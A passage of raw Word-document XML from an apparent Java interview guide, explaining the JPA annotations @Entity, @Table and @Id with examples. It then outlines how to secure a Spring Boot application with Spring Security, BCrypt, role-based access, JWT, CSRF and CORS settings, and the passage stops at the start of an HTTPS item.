    <w:p w14:paraId="55CD6B83" w14:textId="5A024E98" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620CC"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JPA (Java Persistence API), the annotations @Entity, @Table, and @Id are used to define the mapping between Java classes and database tables. Here's a breakdown of the differences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A275ED" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620C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Entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2792F02C"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urpose</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Marks a Java class as a JPA entity that will be mapped to a table in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B14911D"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age</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The class annotated with @Entity represents a persistent object that JPA will manage. By default, JPA assumes the table name will match the class name, but this can be customized using the @Table annotation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0FEA29"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r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509724EC"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tity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51705FA7"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Employee {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F12756A"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fields, constructors, getters, setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622F44FD"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A7683D0" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620C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Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAB9D9A"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urpose</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Specifies the table in the database that the entity should be mapped to. It is used to customize the name of the table or other table properties like schema and catalog.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C9EB06"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age</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This annotation is optional. If not specified, JPA will use the default table name, which is the same as the entity's class name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4A02FF"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r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1861C4DC"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tity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C9E5B0"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able(name = "employee_table")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517D92DD"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public class Employee {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597800ED"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fields, constructors, getters, setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC8595D"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001939C1"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this example, the Employee entity will be mapped to the employee_table in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C9430E" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620C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Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1E54CA"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Marks a field as the primary key for the entity. Every entity must have a primary key field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA7B5A7"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Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This annotation is required for each JPA entity. It specifies which field uniquely identifies each record in the corresponding table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F0B390"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25258ABC"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tity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C480598"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able(name = "employee_table")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620B7401"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Employee {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6E37C2" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620CC" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B5DEECF"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Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9F533E"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Long id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24493569" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620CC" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2792C65A"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ivate String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D02FEE" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620CC" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01CB9103"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 other fields, constructors, getters, setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7986C181"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41BA7285"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this example, the id field is the primary key for the Employee entity, and JPA will use it as the unique identifier for each Employee record in the employee_table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C81E14" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620C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Summary of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5"/>
        <w:gridCol w:w="3730"/>
        <w:gridCol w:w="5359"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="2091E277" w14:textId="77777777" w:rsidTr="003620CC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20369CDD" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620C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Annotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A2C9B95" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620C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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C59800A" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620C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Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="44EB7DC3" w14:textId="77777777" w:rsidTr="003620CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17A9B91D"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tity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="652F44C1"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Marks the class as an entity (a persistent object)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="616D9B4B"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ed to indicate that the class is mapped to a database table.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="26DF5943" w14:textId="77777777" w:rsidTr="003620CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="194482CD"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able</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="745AA798"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ecifies the table name in the database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54DC6A1A"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Optionally used to specify the name of the table, schema, and catalog.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="1E8A3060" w14:textId="77777777" w:rsidTr="003620CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="617035CE"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d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28CD1134"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Defines the primary key field of the entity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E19CAE9"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ed to mark the field that will serve as the primary key for the entity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="366EA3A6"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n conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D88E9CD"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tity makes a class persistent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187E36CA"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able is optional and used to specify table details (e.g., name).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D08AAA4"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d is used to define the primary key of the entity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EDD50B" w14:textId="1F3954AE" w:rsidR="00132306" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0013230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913FF63">
          <v:rect id="_x0000_i2742" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="623BC305" w14:textId="698293D4" w:rsidR="00FA1FFD" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA1FFD" w:rsidP="00FA1FFD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="665" w:name="_Toc196308145"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you secure a Spring Boot application?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="665"/>
    </w:p>
    <w:p w14:paraId="4263D0BC" w14:textId="512075F3" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620CC" w:rsidP="002C6305">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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curing a Spring Boot application involves various techniques to protect sensitive data, prevent unauthorized access, and safeguard the application from common vulnerabilities. Below are the steps and techniques to secure a Spring Boot application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4B90E5" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620C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 Use Spring Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10025771"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Spring Security</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the most commonly used library for securing a Spring Boot application. It provides authentication, authorization, and protection against various attacks (e.g., CSRF, XSS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E15102"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o add Spring Security, you need to add the dependency in the pom.xml (for Maven):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ED9418"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3F571271"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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6B5BF6"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lt;artifactId&gt;spring-boot-starter-security&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B396DA"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t;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAF02A9"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pring Security automatically configures basic HTTP security for your application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7405E296" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620C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2. Enable Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D2827D"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Basic Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For simple applications or APIs, you can enable basic authentication where users provide their credentials as part of the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E4C1C3"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ation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EA3333"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ableWebSecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BB11CE"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SecurityConfig extends WebSecurityConfigurerAdapter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA6E359"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 xml:space="preserve">    @Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6CD387"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otected void configure(HttpSecurity http) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFBC82C"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http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223B09A4"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horizeRequests()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEDA142"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tMatchers("/api/**").authenticated()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30504229"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d()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1206E8ED"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httpBasic(); // Enabling basic authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E229142"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7F2B5D8D"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3DB0DC7D"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Form-Based Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can configure Spring Security to handle form login:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45078166"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http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFC05AA"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horizeRequests()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E721BE8"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tMatchers("/login", "/signup").permitAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA56242"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yRequest().authenticated()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B742AF"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d()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72862311"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formLogin().loginPage("/login").permitAll();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFC27CF" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620C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3. Password Encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8FE194"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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>password hashing</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to securely store passwords. You can configure Spring Security to use BCryptPasswordEncoder or another password encoder:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCDB925"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Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4473C4"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PasswordEncoder passwordEncoder() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1A104E"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turn new BCryptPasswordEncoder();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF03B9B"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12B76C9"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sure that passwords are hashed when saved to the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B78CFD2" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620C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4. Role-Based Authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C953C0"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Implement </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>role-based access control</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (RBAC) to authorize users based on their roles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9EC9E3"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ation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B3DAD7"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nableWebSecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DF27A0"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SecurityConfig extends WebSecurityConfigurerAdapter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FFDD7A"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verride</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E03536"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rotected void configure(HttpSecurity http) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6632AF"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http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB323C9"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uthorizeRequests()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3970C969"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tMatchers("/admin/**").hasRole("ADMIN")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EB907F"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tMatchers("/user/**").hasRole("USER")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06131954"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yRequest().authenticated()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BF600B"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d()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D44623"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formLogin();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9372C6"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76A6E966"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7C54D53A" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620C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5. JWT (JSON Web Token) for Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8516EB"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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JWT</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for stateless authentication. Instead of storing session information on the server, you can encode a JWT containing user data and send it in HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CD1128"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integrate JWT-based authentication by adding filters to intercept incoming requests and validate the JWT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371818ED"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32811D6E" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620CC"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hen the user logs in, generate a JWT token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E52DCEE" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620CC"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nd the token in the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF25360" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620CC"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For every subsequent request, the client sends the token in the Authorization header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A757D90" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620CC"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e Spring Security filter validates the token before allowing access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185EE88A" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620C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6. CSRF Protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0BA6D7"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cross-Site Request Forgery (CSRF)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> attacks can be mitigated by enabling CSRF protection in Spring Security. By default, Spring Security enables CSRF protection for all applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360C3C21"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http.csrf().enable(); // CSRF protection enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6B9668"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You can disable CSRF for specific situations (e.g., for stateless REST APIs) by configuring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5075D425"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http.csrf().disable();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53586A67" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620C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7. CORS (Cross-Origin Resource Sharing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F6DEE4"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">To secure your APIs from unauthorized cross-origin requests, configure </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CORS</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Cross-Origin Resource Sharing) policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D192C3"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Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F83D0C"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ublic class WebConfig implements WebMvcConfigurer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4AF005"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE6B08F"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public void addCorsMappings(CorsRegistry registry) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C100F07"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registry.addMapping("/api/**")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1D5868"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llowedOrigins("https://example.com")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D577F5"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llowedMethods("GET", "POST");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F67B451"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587D57BF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9C2FCC" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620C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8. HTTPS (SSL/TLS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E29727"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Enable </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
